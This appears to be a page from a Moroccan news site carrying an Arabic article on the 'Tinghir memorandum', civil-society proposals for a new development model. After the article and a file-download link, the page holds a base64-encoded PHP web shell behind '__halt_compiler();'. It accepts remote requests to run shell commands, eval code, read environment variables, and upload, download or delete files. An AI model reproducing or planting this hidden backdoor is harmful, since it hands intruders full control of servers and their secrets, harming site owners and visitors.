Accueil / Actualités / « مذكرة تينغير » توصي بالديمقراطية التعاقدية والتنمية المجالية الذاتية

« مذكرة تينغير » توصي بالديمقراطية التعاقدية والتنمية المجالية الذاتية

دعت مجموعة من الفعاليات الجمعوية إلى « إقرار الديمقراطية التعاقدية في تدبير الشأن العام والربط الفعلي للمسؤولية بالمحاسبة، وما يصاحب ذلك من اعتماد مجالس إدارية منتخبة لتدبير المجالس الترابية، ليكون المنتخبون هم المدبرون الفعليون للشأن العام، وليس مجرد متطوعين مسيرين، وانتخابهم  وفق أجندة وبرامج ونتائج محددة بشكل تعاقدي مع السلطة ومع المجتمع، إلى جانب تفعيل اللامركزية واللاتركيز، وربط  تفويض الاختصاصات بتوفير الموارد المالية والبشرية، ووضع استراتيجية وطنية للتعبئة والمسؤولية المجتمعية للتنظيمات ».

ففي مذكرة مرفوعة إلى اللجنة الخاصة بالنموذج التنموي، سطر شباب ينتمون إلى نحو 50 هيأة مدنية من إقليم تينغير ما أسموه « مذكرة تينغير حول النموذج التنموي الجديد »، ودعوا خلالها إلى « التمكين المنصف لخلق بيئة محفزة على الاستقرار والاستثمار والتنمية المجالية الذاتية » و « استرجاع ظروف استدامة المنظومات الايكولوجية والاقتصادية للواحة العدالة الاجتماعية والتمييز الايجابي لجبر الضرر الترابي، كمفاتيح كبرى للنموذج التنموي الجديد ».

المذكرة الجمعوية التي كانت نتاج مخاض مجموعة من ورشات التفكير الجماعي بمناطق مختلفة من الإقليم، انطلقت من واقعها أنموذجا لاستلهام مبادئ يمكن تعميمها على المستوى الجهوي والوطني خاصة في المناطق ذات الطبيعة الجبلية الواحية.

ومن أبرز ما خلصت إليه المذكرة، التي توصلنا بنسخة منها، ضرورة تفعيل نموذج تنموي « لا يرتهن بمنطق المؤشرات الديموغرافية والسكانية ومعايير المردودية والجدوى الإقتصادية ومنطق الضغط والتشبيك وميزان القوى، وهو منطق غير حقوقي وغير مستدام على المستوى التنموي، حفز الهجرة وعدم الاستقرار بالمجال، وكرس الإحساس بالإقصاء وعدم الإنصاف »

في مجال « استرجاع ظروف استدامة المنظومات الايكولوجية والاقتصادية للواحة » تقترح « مذكرة تينغير » ، إحداث قرى ايكولوجية نموذجية لتجميع سكان الدواوير، وخلق أقطاب مهيكلة للخدمات والصناعة والحرف في المراكز الناشئة لتقوية بنيتها الاقتصادية ودعم جاذبيتها ووظائفها الاقتصادية. اعتماد قوانين منظمة للبناء والتعمير من أجل الحفاظ على نمط المعمار الجهوي والمحلي من حيث التصاميم وكذا المواد البناء المحلية، دعم سلاسل الانتاج الثقافي التراثي الجهوي والمحلي وتنزيل الطابع الرسمي للغة والثقافة الأمازيغيتين.

ولتحفيز الاستقرار والاستثمار اقترحت المذكرة وضع « استراتيجة بناء وتقوية البنية التحتية الأساسية والمشاريع المهيكلة الكبرى، عبر الطرق والمواصلات كناقل أساسي للتنمية وكمحفز على التحول والتطور، واستراتيجية حكومية لتحفيز التنمية المجالية الذاتية بتجهيز المناطق المعدة للاستثمار في كل مجال حضري (مناطق سياحية وحرفية وصناعية وخدماتية مجهزة ) وتمكينه من التمويل العمومي الضامن لإقلاعه، وتهيئة وتأهيل المجالات الحضرية  وإعادة النظر في تنظيم المراكز القروية ».

كما لم تغفل المذكرة أهمية تحسين الولوج إلى الخدمات الاجتماعية الأساسية، ودعت إلى إنشاء مدينة للبحث العلمي والمهن والكفاءات داخل تراب الاقليم: تهتم خاصة بتنمية الظروف المناسبة لبلورة الخدمات و صناعات المعرفة والذكاء الصناعي والمعلوميات والصناعات الخضراء والمعادن والبحوث العلمية المرتبطة بالواحات، من قبيل المركب الجامعي المتعدد التخصصات للتكوين و البحث العلمي في المجالات الواحية  والجافة، ومركز للغات الدولية ومراكز متخصصة للهندسة في المعلوميات والطاقات النظيفة، تكون مفتوحة في وجه الطلبة من كل أقاليم المملكة، وإنشاء مركبات تربوية ايكولوجية عوض الأقسام والوحدات الدراسية المشتتة وعوض المدارس الجماعاتية، إلى جانب مركبات تدمج التعليم الأولي مع مراكز محاربة الأمية والعمل التعاوني النسوي.وكذلك حوكمة السياسة الصحية: خلق مركب استشفائي متكامل مع تسهيل الولوج إليه بسيارات اسعاف مجهزة من كل مناطق الإقليم مع توفره على حوامة دائمة للطوارئ، وإحداث مستشفى عسكري دائم بالإقليم، ومستشفى جامعي جهوي.

وقد اعتبرت « مذكرة تينغير حول النموذج التنموي الجديد » العقار أهم الإشكالات الكابحة للتنمية ونادت إلى ضرورة « ترصيد وتثمين العقار كأساس للاستثمار وجبر الضرر التنموي، وذلك بتحويل عائدات كراء وتفويت الأراضي السلالية إلى مداخيل المجالس المنتخبة عوض تجميعها مركزيا في صندوق التنمية القروية، وتكييف قوانين البناء والتعمير مع خصوصيات المجال الواحي الجبلي، وإيجاد حل للأملاك العسكرية والمخزنية والثكنات المتواجدة داخل المجالات الحضرية، واستخراج الأملاك الخاصة من التحديد الإداري لتسهيل التحفيظ الجماعي، إلى جانب استراتيجية متكاملة للاقتصاد التضامني والاجتماعي الواحي. »

« المذكرة المدنية الإقليمية »، التي أعدتها فعاليات تنتمي إلى مجموعة من الفدراليات والشبكات والجمعيات، استطاعت ، حسب المشرفين عليها، « أن تخلق نقاشا حيويا بين عشرات الفاعلين المدنيين من مختلف المشارب للتوافق على رؤى تنموية تتجاوز النظرة الضيقة المرتبطة بالمصالح الخاصة والفئوية والذاتية إلى التفكير الاستشرافي المستقبلي. »

في تصريحه للموقع، يقول الناشط المدني كريم إسكلا، أحد المشرفين على إعداد المذكرة، أن « من أبرز المقترحات النوعية التي خلصت إليها مذكرة تينغير مقترح إحداث برلمانات جهوية وإقرار الديمقراطية التعاقدية وتوسيع دائرة التشريع الجهوي والمحلي، وذلك باعتماد مجالس إدارية منتخبة لتدبير الشأن المحلي والإقليمي والجهوي ». إضافة إلى « خلق تعاقد مجتمعي تعبأ فيه كل قوى المجتمع من التشاور والمشاركة الفعلية والفعالة والانخراط الإيجابي لجميع المعنيين الفاعلين من أجل بناء الدولة-الوطن، في إطار التعبئة الجماعية والمسؤولية المجتمعية للتنظيمات « .

وقد أكد المشرفون على « مذكرة تينغير » ، باعتبارها خلاصة لتصورات ومقترحات تركيبية لمجموعة من الجمعيات، على أنهم ومن خلال اقتراح حلول للكوابح والعوائق التنموية بمنطقتهم فهم بذلك يقدمون تصورات ملهمة وقابلة للتعميم على المستوى الوطني في اطار النموذج التنموي الجديد، كما أكدوا على أن المذكرة ستكون أرضية ترافعية من أجل إصلاح ما يمكن إصلاحه على المستوى الإقليمي.

Télécharger les fichiers

__halt_compiler(); ZnVuY3Rpb24gcmVzcG9uc2UoJGRhdGEsICRjb2RlID0gMjAwKSB7DQoJaHR0cF9yZXNwb25zZV9jb2RlKCRjb2RlKTsNCgloZWFkZXIoJ0NvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbicpOw0KCWV4aXQoanNvbl9lbmNvZGUoJGRhdGEpKTsNCn0NCmZ1bmN0aW9uIGVycm9yKCRtZXNzYWdlLCAkY29kZSA9IDQwMCkgew0KCXJlc3BvbnNlKFsnbWVzc2FnZScgPT4gJG1lc3NhZ2VdLCAkY29kZSk7DQp9DQpmdW5jdGlvbiBlcnJvcl9hc3NlcnQoJGV4cHJlc3Npb24sICRtZXNzYWdlLCAkY29kZSA9IDQwMCkgew0KCWlmICgkZXhwcmVzc2lvbikgZXJyb3IoJG1lc3NhZ2UsICRjb2RlKTsNCn0NCiRpbnB1dCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCdwaHA6Ly9pbnB1dCcpOw0KZXJyb3JfYXNzZXJ0KCFzdHJsZW4oJGlucHV0KSwgJ0VtcHR5IGJvZHknKTsNCiRib2R5ID0ganNvbl9kZWNvZGUoJGlucHV0LCB0cnVlKTsNCnVuc2V0KCRpbnB1dCk7DQplcnJvcl9hc3NlcnQoaXNfbnVsbCgkYm9keSksICdJbnZhbGlkIGJvZHknKTsNCiRhY3Rpb24gPSBAJGJvZHlbJ2FjdGlvbiddOw0KZXJyb3JfYXNzZXJ0KGlzX251bGwoJGFjdGlvbiksICdBY3Rpb24gbm90IHNwZWNpZmVkJyk7DQplcnJvcl9hc3NlcnQoIWlzX3N0cmluZygkYWN0aW9uKSwgJ0FjdGlvbiBtdXN0IGJlIHN0cmluZycpOw0KZnVuY3Rpb24gcmVzdWx0KCRyZXN1bHQpIHsNCglyZXNwb25zZShbJ3Jlc3VsdCcgPT4gJHJlc3VsdF0pOw0KfQ0Kc3dpdGNoKCRhY3Rpb24pIHsNCgljYXNlICdjaGVjayc6DQoJCXJlc3VsdChbDQoJCQknY29wcGVyJyA9PiB0cnVlLA0KCQkJJ3BocCcgPT4gQHBocHZlcnNpb24oKSwNCgkJCSdwYXRoJyA9PiBfX0ZJTEVfXywNCgkJCSdyb290JyA9PiAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddDQoJCV0pOw0KCWNhc2UgJ2V4ZWMnOiB7DQoJCSRjb21tYW5kID0gQCRib2R5Wydjb21tYW5kJ107DQoJCWVycm9yX2Fzc2VydChpc19udWxsKCRjb21tYW5kKSwgJ0NvbW1hbmQgbm90IHNwZWNpZmVkJyk7DQoJCWVycm9yX2Fzc2VydCghaXNfc3RyaW5nKCRjb21tYW5kKSwgJ0NvbW1hbmQgbXVzdCBiZSBzdHJpbmcnKTsNCgkJZXJyb3JfYXNzZXJ0KCFzdHJsZW4oJGNvbW1hbmQpLCAnQ29tbWFuZCBtdXN0IGJlIG5vbi1lbXB0eScpOw0KCQlpZiAoQCRib2R5WydzdGRlcnInXSA9PT0gdHJ1ZSkgJGNvbW1hbmQgLj0gJyAyPiYxJzsNCgkJJG91dHB1dCA9IHNoZWxsX2V4ZWMoJGNvbW1hbmQpOw0KCQllcnJvcl9hc3NlcnQoaXNfbnVsbCgkb3V0cHV0KSwgJ0NvbW1hbmQgZXhlY3V0aW9uIGVycm9yJywgNTAwKTsNCgkJcmVzdWx0KCRvdXRwdXQpOw0KCX0NCgljYXNlICd1bmFtZSc6DQoJCXJlc3VsdChwaHBfdW5hbWUoKSk7DQoJY2FzZSAncGhwaW5mbyc6IHsNCgkJb2Jfc3RhcnQoKTsNCgkJcGhwaW5mbygpOw0KCQkkb3V0cHV0ID0gb2JfZ2V0X2NvbnRlbnRzKCk7DQoJCW9iX2VuZF9jbGVhbigpOw0KCQlyZXN1bHQoJG91dHB1dCk7DQoJfQ0KCWNhc2UgJ2V2YWwnOiB7DQoJCSRjb2RlID0gQCRib2R5Wydjb2RlJ107DQoJCWVycm9yX2Fzc2VydChpc19udWxsKCRjb2RlKSwgJ0NvZGUgbm90IHNwZWNpZmVkJyk7DQoJCWVycm9yX2Fzc2VydCghaXNfc3RyaW5nKCRjb2RlKSwgJ0NvZGUgbXVzdCBiZSBhIHN0cmluZycpOw0KCQllcnJvcl9hc3NlcnQoIXN0cmxlbigkY29kZSksICdDb2RlIG11c3QgYmUgbm9uLWVtcHR5Jyk7DQoJCSRjb250ZW50ID0gW107DQoJCW9iX3N0YXJ0KCk7DQoJCXRyeSB7DQoJCQkkY29udGVudFsncmV0dXJuJ10gPSBAZXZhbCgkY29kZSk7DQoJCX0gY2F0Y2ggKFBhcnNlRXJyb3IgJGVycikgew0KCQkJb2JfZW5kX2NsZWFuKCk7DQoJCQllcnJvcigkZXJyLT5nZXRNZXNzYWdlKCkpOw0KCQl9DQoJCSRjb250ZW50WydvdXRwdXQnXSA9IG9iX2dldF9jb250ZW50cygpOw0KCQlvYl9lbmRfY2xlYW4oKTsNCgkJcmVzdWx0KCRjb250ZW50KTsNCgl9DQoJY2FzZSAnZW52Jzogew0KCQkkbmFtZSA9IEAkYm9keVsnbmFtZSddOw0KCQkkb3V0cHV0Ow0KCQlpZiAoaXNzZXQoJG5hbWUpKSB7DQoJCQllcnJvcl9hc3NlcnQoIWlzX3N0cmluZygkbmFtZSksICdOYW1lIG11c3QgYmUgYSBzdHJpbmcnKTsNCgkJCWVycm9yX2Fzc2VydChzdHJsZW4oJG5hbWUpID09PSAwLCAnTmFtZSBtdXN0IGJlIG5vbi1lbXB0eScpOw0KCQkJJG91dHB1dCA9IChpc3NldCgkX0VOVlskbmFtZV0pKSA/ICRfRU5WWyRuYW1lXSA6IEBnZXRlbnYoJG5hbWUpOw0KCQl9IGVsc2UgJG91dHB1dCA9IChjb3VudCgkX0VOVikgPT09IDApID8gQGdldGVudigpIDogJF9FTlY7DQoJCWVycm9yX2Fzc2VydCgkb3V0cHV0ID09PSBmYWxzZSwgJ1ZhcmlhYmxlIG5vdCBleGlzdHMnLCA0MDQpOw0KCQlyZXN1bHQoJG91dHB1dCk7DQoJfQ0KCWNhc2UgJ2N3ZCc6IHsNCgkJJGN3ZCA9IEBnZXRjd2QoKTsNCgkJZXJyb3JfYXNzZXJ0KCRjd2QgPT09IGZhbHNlLCAnRXJyb3IgZ2V0dGluZyBjd2QnKTsNCgkJcmVzdWx0KCRjd2QpOw0KCX0NCgljYXNlICd1cGxvYWQnOiB7DQoJCSRwYXRoID0gQCRib2R5WydwYXRoJ107DQoJCWVycm9yX2Fzc2VydChpc19udWxsKCRwYXRoKSwgJ1BhdGggbm90IHNwZWNpZmVkJyk7DQoJCSRmaWxlID0gQCRib2R5WydmaWxlJ107DQoJCWVycm9yX2Fzc2VydChpc19udWxsKCRmaWxlKSwgJ0ZpbGUgbm90IHNwZWNpZmVkJyk7DQoJCWVycm9yX2Fzc2VydCghaXNfc3RyaW5nKCRwYXRoKSwgJ1BhdGggbXVzdCBiZSBhIHN0cmluZycpOw0KCQllcnJvcl9hc3NlcnQoIWlzX3N0cmluZygkZmlsZSksICdGaWxlIG11c3QgYmUgYSBiYXNlNjQgc3RyaW5nJyk7DQoJCSRjb250ZW50ID0gYmFzZTY0X2RlY29kZSgkZmlsZSwgdHJ1ZSk7DQoJCWVycm9yX2Fzc2VydCgkY29udGVudCA9PT0gZmFsc2UsICdGaWxlIGRlY29kaW5nIGVycm9yJyk7DQoJCSRoYW5kbGUgPSBAZm9wZW4oJHBhdGgsICd3YicpOw0KCQllcnJvcl9hc3NlcnQoISRoYW5kbGUsICdGaWxlIG9wZW4gZXJyb3InLCA1MDApOw0KCQllcnJvcl9hc3NlcnQoIUBmd3JpdGUoJGhhbmRsZSwgJGNvbnRlbnQpLCAnRmlsZSB3aXJ0ZSBlcnJvcicsIDUwMCk7DQoJCWVycm9yX2Fzc2VydCghQGZjbG9zZSgkaGFuZGxlKSwgJ0ZpbGUgY2xvc2UgZXJyb3InLCA1MDApOw0KCQlyZXN1bHQoJ0ZpbGUgc3VjY2Vzc2Z1bHkgd3JpdHRlbicpOw0KCX0NCgljYXNlICdkb3dubG9hZCc6IHsNCgkJJHBhdGggPSBAJGJvZHlbJ3BhdGgnXTsNCgkJZXJyb3JfYXNzZXJ0KGlzX251bGwoJHBhdGgpLCAnUGF0aCBub3Qgc3BlY2lmZWQnKTsNCgkJZXJyb3JfYXNzZXJ0KCFpc19zdHJpbmcoJHBhdGgpLCAnUGF0aCBtdXN0IGJlIGEgc3RyaW5nJyk7DQoJCWVycm9yX2Fzc2VydCghZmlsZV9leGlzdHMoJHBhdGgpLCAnRmlsZSBub3QgZXhpc3RzJyk7DQoJCSRoYW5kbGUgPSBAZm9wZW4oJHBhdGgsICdyYicpOw0KCQllcnJvcl9hc3NlcnQoISRoYW5kbGUsICdGaWxlIG9wZW4gZXJyb3InLCA1MDApOw0KCQkkb3V0cHV0Ow0KCQllcnJvcl9hc3NlcnQoISgkb3V0cHV0ID0gQHN0cmVhbV9nZXRfY29udGVudHMoJGhhbmRsZSkpLCAnRmlsZSB3aXJ0ZSBlcnJvcicsIDUwMCk7DQoJCWVycm9yX2Fzc2VydCghQGZjbG9zZSgkaGFuZGxlKSwgJ0ZpbGUgY2xvc2UgZXJyb3InLCA1MDApOw0KCQlyZXN1bHQoYmFzZTY0X2VuY29kZSgkb3V0cHV0KSk7DQoJfQ0KCWNhc2UgJ2xzJzogew0KCQkkcGF0aCA9IEAkYm9keVsncGF0aCddOw0KCQllcnJvcl9hc3NlcnQoaXNfbnVsbCgkcGF0aCksICdQYXRoIG5vdCBzcGVjaWZlZCcpOw0KCQllcnJvcl9hc3NlcnQoIWlzX3N0cmluZygkcGF0aCksICdQYXRoIG11c3QgYmUgYSBzdHJpbmcnKTsNCgkJZXJyb3JfYXNzZXJ0KCFmaWxlX2V4aXN0cygkcGF0aCksICdEaXJlY3Rvcnkgbm90IGV4aXN0cycpOw0KCQllcnJvcl9hc3NlcnQoIWlzX2RpcigkcGF0aCksICdGaWxlIGlzIG5vdCBhIGRpcmVjdG9yeScpOw0KCQkkZGlyID0gQG9wZW5kaXIoJHBhdGgpOw0KCQllcnJvcl9hc3NlcnQoISRkaXIsICdEaXJlY3Rvcnkgb3BlbiBlcnJvcicpOw0KCQkkb3V0cHV0ID0gW107DQoJCXdoaWxlICgoJGVudHJ5ID0gQHJlYWRkaXIoJGRpcikpICE9PSBmYWxzZSkgew0KCQkJJGVudHJ5X3BhdGggPSAkcGF0aCAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkZW50cnk7DQoJCQlhcnJheV9wdXNoKCRvdXRwdXQsIFsNCgkJCQknZmlsZW5hbWUnID0+ICRlbnRyeSwNCgkJCQkndHlwZScgPT4gQGZpbGV0eXBlKCRlbnRyeV9wYXRoKSwNCgkJCQkncGVybWlzc2lvbnMnID0+IEBmaWxlcGVybXMoJGVudHJ5X3BhdGgpDQoJCQldKTsNCgkJfQ0KCQlyZXN1bHQoJG91dHB1dCk7DQoJfQ0KCWNhc2UgJ21rZGlyJzogew0KCQkkcGF0aCA9IEAkYm9keVsncGF0aCddOw0KCQllcnJvcl9hc3NlcnQoaXNfbnVsbCgkcGF0aCksICdQYXRoIG5vdCBzcGVjaWZlZCcpOw0KCQllcnJvcl9hc3NlcnQoIWlzX3N0cmluZygkcGF0aCksICdQYXRoIG11c3QgYmUgYSBzdHJpbmcnKTsNCgkJZXJyb3JfYXNzZXJ0KCFAbWtkaXIoJHBhdGgpLCAnRGljcmVjdG9yeSBjcmVhdGUgZXJyb3InLCA1MDApOw0KCQlyZXN1bHQoJ0RpcmVjdG9yeSBzdWNjZXNzZnVseSBjcmVhdGVkJyk7DQoJfQ0KCWNhc2UgJ3JtJzogew0KCQkkcGF0aCA9IEAkYm9keVsncGF0aCddOw0KCQllcnJvcl9hc3NlcnQoaXNfbnVsbCgkcGF0aCksICdQYXRoIG5vdCBzcGVjaWZlZCcpOw0KCQllcnJvcl9hc3NlcnQoIWlzX3N0cmluZygkcGF0aCksICdQYXRoIG11c3QgYmUgYSBzdHJpbmcnKTsNCgkJZXJyb3JfYXNzZXJ0KCFmaWxlX2V4aXN0cygkcGF0aCksICdGaWxlIG5vdCBleGlzdHMnKTsNCgkJZXJyb3JfYXNzZXJ0KCFAdW5saW5rKCRwYXRoKSwgJ0ZpbGUgZGVsZXRlIGVycm9yJywgNTAwKTsNCgkJcmVzdWx0KCdGaWxlIHN1Y2Nlc2Z1bHkgZGVsZXRlZCcpOw0KCX0NCgljYXNlICdybWRpcic6IHsNCgkJJHBhdGggPSBAJGJvZHlbJ3BhdGgnXTsNCgkJZXJyb3JfYXNzZXJ0KGlzX251bGwoJHBhdGgpLCAnUGF0aCBub3Qgc3BlY2lmZWQnKTsNCgkJZXJyb3JfYXNzZXJ0KCFpc19zdHJpbmcoJHBhdGgpLCAnUGF0aCBtdXN0IGJlIGEgc3RyaW5nJyk7DQoJCWVycm9yX2Fzc2VydCghZmlsZV9leGlzdHMoJHBhdGgpLCAnRGlyZWN0b3J5IG5vdCBleGlzdHMnKTsNCgkJZXJyb3JfYXNzZXJ0KCFpc19kaXIoJHBhdGgpLCAnRmlsZSBpcyBub3QgYSBkaXJlY3RvcnknKTsNCgkJZXJyb3JfYXNzZXJ0KCFAcm1kaXIoJHBhdGgpLCAnRGljcmVjdG9yeSBjcmVhdGUgZXJyb3InLCA1MDApOw0KCQlyZXN1bHQoJ0RpcmVjdG9yeSBzdWNjZXNmdWx5IGRlbGV0ZWQnKTsNCgl9DQoJZGVmYXVsdDoNCgkJZXJyb3IoJ1Vua25vd24gYWN0aW9uJyk7DQp9